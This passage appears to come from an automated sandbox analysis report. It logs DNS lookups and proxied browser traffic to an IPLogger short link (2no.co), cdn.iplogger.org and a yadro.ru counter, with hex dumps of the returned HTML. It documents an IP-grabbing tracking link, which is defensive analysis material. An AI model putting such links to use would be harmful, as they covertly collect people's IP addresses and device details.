                                                                                                                Jul 30, 2024 00:49:18.821640015 CEST1.1.1.1192.168.2.90x57efNo error (0)counter.yadro.ru88.212.201.198A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:18.821640015 CEST1.1.1.1192.168.2.90x57efNo error (0)counter.yadro.ru88.212.202.52A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:18.943311930 CEST1.1.1.1192.168.2.90x6d68No error (0)www.google.com65IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:18.943326950 CEST1.1.1.1192.168.2.90x2bc2No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:19.703157902 CEST1.1.1.1192.168.2.90x8fcfNo error (0)cdn.iplogger.org104.21.4.208A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:19.703157902 CEST1.1.1.1192.168.2.90x8fcfNo error (0)cdn.iplogger.org172.67.132.113A (IP address)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:19.705604076 CEST1.1.1.1192.168.2.90x81efNo error (0)cdn.iplogger.org65IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:33.985019922 CEST1.1.1.1192.168.2.90xebebName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:49:37.781248093 CEST1.1.1.1192.168.2.90x7859Name error (3)26.165.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                Jul 30, 2024 00:50:19.007097006 CEST1.1.1.1192.168.2.90x865bNo error (0)www.google.com142.250.181.228A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • 2no.co
                                                                                                                • https:
                                                                                                                  • cdn.iplogger.org
                                                                                                                  • counter.yadro.ru
                                                                                                                  • www.bing.com
                                                                                                                • slscr.update.microsoft.com
                                                                                                                • a.nel.cloudflare.com
                                                                                                                • fs.microsoft.com
                                                                                                                • fe3cr.delivery.mp.microsoft.com

                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.949722172.67.149.764435364C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:15 UTC655OUTGET /24RXx6 HTTP/1.1
                                                                                                                Host: 2no.co
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-07-29 22:49:16 UTC1089INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 29 Jul 2024 22:49:16 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                set-cookie: 54988964137263905=1; expires=Tue, 29 Jul 2025 22:49:16 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                set-cookie: unikey=unikey_8355deb3d6713dce9697dd87f6c09469523dcb34aad54ffbbeb80daf49b4b947; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                memory: 0.4217071533203125
                                                                                                                expires: Mon, 29 Jul 2024 22:49:16 +0000
                                                                                                                strict-transport-security: max-age=604800
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KvpSgXJ1mP5JWZIjXUk6UwXmu4hNZv3lz1OMGpS0%2BLmZlGnTpwngXEFTYTgg5wHD95n7%2FJFOtDQf0Eyo0EyuiD20eM872vEx6NaKHYmRzaNMefEeE4gS9MY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ab0a9411fca4368-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                2024-07-29 22:49:16 UTC280INData Raw: 32 36 62 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 55 53 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 42 72 61 6e 64 65 64 20 53 68 6f 72 74 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e
                                                                                                                Data Ascii: 26b5<!DOCTYPE html><html lang="US" class="html"><head><title>Branded Short Domain</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" conten
                                                                                                                2024-07-29 22:49:16 UTC1369INData Raw: 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 44 65 6f 72 67 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 49 50 4c 6f 67 67 65 72 20 32 30 31 30 2d 32 30 32 34 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65
                                                                                                                Data Ascii: itial-scale=1, user-scalable=yes"><meta name="author" content="Deorg" /><meta name="copyright" content="Copyright IPLogger 2010-2024" /><meta name="robots" content="index, follow" /><meta name="revisit-after" content="7 days" /><meta name="ke
                                                                                                                2024-07-29 22:49:16 UTC1369INData Raw: 6e 64 3a 23 45 35 45 35 45 35 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 2e 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 38 30 30 70 78 29 7b 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 7d 7d 23 6c 6f 61 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 70 78 3b 6c 65 66 74 3a 30 70 78 3b 72 69 67 68 74 3a 30 70 78 3b 62 6f 74 74 6f 6d 3a 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 35 45 35 45 35 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 35 30
                                                                                                                Data Ascii: nd:#E5E5E5;font-family:Helvetica,Arial,sans-serif;letter-spacing:0.2px;font-size:1em}@media screen and (max-width:800px){body{font-size:1.2em}}#loader{position:absolute;top:0px;left:0px;right:0px;bottom:0px;background:#E5E5E5;z-index:10000;padding-top:250
                                                                                                                2024-07-29 22:49:16 UTC1369INData Raw: 74 69 6f 6e 20 74 6f 20 64 69 73 70 6c 61 79 20 74 68 65 20 6d 61 70 2e 2e 2e 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 32 35 30 70 78 3b 74 6f 70 3a 32 35 25 3b 6c 65 66 74 3a 63 61 6c 63 28 35 30 25 20 2d 20 31 32 35 70 78 29 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 63 6f 6c 6f 72 3a 23 38 31 38 31 38 31 7d 0a 09 23 6d 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 64 61 73 68 65 64 20 62 6c 61 63 6b 3b 68 65 69 67 68 74 3a 34 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0a 09 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 38 30 30 70 78 29 7b 23 6d 61 70 70 65 72 7b 68 65 69 67 68 74
                                                                                                                Data Ascii: tion to display the map...";position:absolute;width:250px;top:25%;left:calc(50% - 125px);text-align:center;font-size:24px;color:#818181}#me{border:1px dashed black;height:40px;line-height:40px;text-align:center}@media (max-width: 800px){#mapper{height
                                                                                                                2024-07-29 22:49:16 UTC1369INData Raw: 78 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 22 41 63 63 65 70 74 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 29 2c 78 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 29 2c 78 2e 73 65 6e 64 28 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 64 61 74 61 29 29 2c 78 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 6a 73 6f 6e 29 7b 69 66 28 74 68 69 73 2e 72 65 61 64 79 53 74 61 74 65 21 3d 34 29 72 65 74 75 72 6e 3b 74 72 79 7b 6a 73 6f 6e 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 7d 63 61 74 63 68 28 65 29 7b 6a 73 6f 6e 3d 7b 7d 7d 3b 63 61 6c 6c 62 61 63 6b 28 6a 73 6f 6e 29
                                                                                                                Data Ascii: x.setRequestHeader("Accept","application/json"),x.setRequestHeader("Content-Type","application/json"),x.send(JSON.stringify(data)),x.onload=function(json){if(this.readyState!=4)return;try{json=JSON.parse(this.responseText)}catch(e){json={}};callback(json)
                                                                                                                2024-07-29 22:49:16 UTC1369INData Raw: 73 69 7a 65 3a 32 38 70 78 3b 0a 09 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0a 09 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 63 6f 6e 74 65 6e 74 20 7b 0d 09 70 61 64 64 69 6e 67 3a 20 35 70 78 20 30 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 31 70 78 3b 0a 09 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 74 65 78 74 2d 61 6c 69 67 6e 3a 6a 75 73 74 69 66 79 0a 7d 0a 2e 68 61 6e 64 73 68 61 6b 65 20 7b 0a 7d 0a 2e 68 61 6e 64 73 68 61 6b 65 20 3e 20 69 6d 67 20 7b 0a 09 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0a 09
                                                                                                                Data Ascii: size:28px;font-style:normal;font-weight:bold;color:#333333;text-align: center;}.content {padding: 5px 0px;margin:0;line-height:21px;color:#333333;font-size:14px;text-align:justify}.handshake {}.handshake > img {display:block;
                                                                                                                2024-07-29 22:49:16 UTC1369INData Raw: 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 29 2c 0a 0a 7d 0a 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 36 30 30 70 78 29 20 7b 0d 09 70 2c 20 75 6c 20 6c 69 2c 20 6f 6c 20 6c 69 2c 20 61 20 7b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 25 21 69 6d 70 6f 72 74 61 6e 74 20 7d 0a 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 31 20 61 2c 20 68 32 20 61 2c 20 68 33 20 61 20 7b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 30 25 20 7d 0a 09 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 34 32 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 20 7d 0a 09 68 32 20 7b 20 66 6f 6e 74 2d 73 69
                                                                                                                Data Ascii: dia only screen and (max-height: 600px),}@media only screen and (max-width:600px) {p, ul li, ol li, a { line-height:150%!important }h1, h2, h3, h1 a, h2 a, h3 a { line-height:120% }h1 { font-size:42px!important; text-align:center }h2 { font-si
                                                                                                                2024-07-29 22:49:16 UTC1369INData Raw: 3d 22 73 75 62 6d 69 74 22 3e 0a 09 09 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 3e 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6b 65 79 22 20 76 61 6c 75 65 3d 22 75 6e 69 6b 65 79 5f 38 33 35 35 64 65 62 33 64 36 37 31 33 64 63 65 39 36 39 37 64 64 38 37 66 36 63 30 39 34 36 39 35 32 33 64 63 62 33 34 61 61 64 35 34 66 66 62 62 65 62 38 30 64 61 66 34 39 62 34 62 39 34 37 22 3e 0a 09 09 09 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 6f 6b 22 20 6e 61 6d 65 3d 22 63 6f 6e 73 65 6e 74 22 20 76 61 6c 75 65 3d 22 31 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 41 67 72 65 65 20 26 20 43 6f 6e 74 69 6e 75 65 3c 2f 62 75 74 74 6f 6e 3e 0a 0a 09 09 09 3c 64 69 76
                                                                                                                Data Ascii: ="submit"><form action="" method="POST"><input type="hidden" name="key" value="unikey_8355deb3d6713dce9697dd87f6c09469523dcb34aad54ffbbeb80daf49b4b947"><button class="ok" name="consent" value="1" type="submit">Agree & Continue</button><div
                                                                                                                2024-07-29 22:49:16 UTC54INData Raw: 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: ),d.body.appendChild(a);</script></body></html>
                                                                                                                2024-07-29 22:49:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.949731104.21.4.2084435364C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:17 UTC588OUTGET /redirect/handshake.png HTTP/1.1
                                                                                                                Host: cdn.iplogger.org
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://2no.co/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-07-29 22:49:17 UTC1285INHTTP/1.1 403 Forbidden
                                                                                                                Date: Mon, 29 Jul 2024 22:49:17 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                Referrer-Policy: same-origin
                                                                                                                X-Content-Options: nosniff
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                cf-mitigated: challenge
                                                                                                                2024-07-29 22:49:17 UTC699INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 56 6f 6b 57 6e 57 57 6b 7a 55 41 47 66 4a 6e 69 51 56 73 54 69 38 79 76 67 52 6b 63 53 36 52 44 43 59 35 52 4f 4c 33 78 6e 34 66 63 54 57 42 74 71 33 52 55 46 4a 63 72 33 51 4f 50 62 2b 56 43 6f 6a 30 65 77 53 42 73 69 36 6d 33 4c 6a 41 39 6b 43 78 43 67 71 6c 6c 33 56 79 5a 53 42 73 62 4d 4c 48 6f 4a 68 39 46 37 32 30 3d 24 34 42 36 4a 42 2b 77 45 56 31 65 71 53 58 53 68 53 74 33 62 36 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                                                                Data Ascii: cf-chl-out: VokWnWWkzUAGfJniQVsTi8yvgRkcS6RDCY5ROL3xn4fcTWBtq3RUFJcr3QOPb+VCoj0ewSBsi6m3LjA9kCxCgqll3VyZSBsbMLHoJh9F720=$4B6JB+wEV1eqSXShSt3b6A==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                                                                2024-07-29 22:49:17 UTC1369INData Raw: 33 65 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                                                                Data Ascii: 3efd<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                                                                2024-07-29 22:49:17 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                                                                                                Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                                                                                                2024-07-29 22:49:17 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                                                                                                2024-07-29 22:49:17 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                                                                                                Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.94973088.212.202.524435364C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-07-29 22:49:17 UTC665OUTGET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069 HTTP/1.1
                                                                                                                Host: counter.yadro.ru
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://2no.co/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-07-29 22:49:17 UTC602INHTTP/1.1 302 Moved Temporarily
                                                                                                                Server: nginx/1.17.9
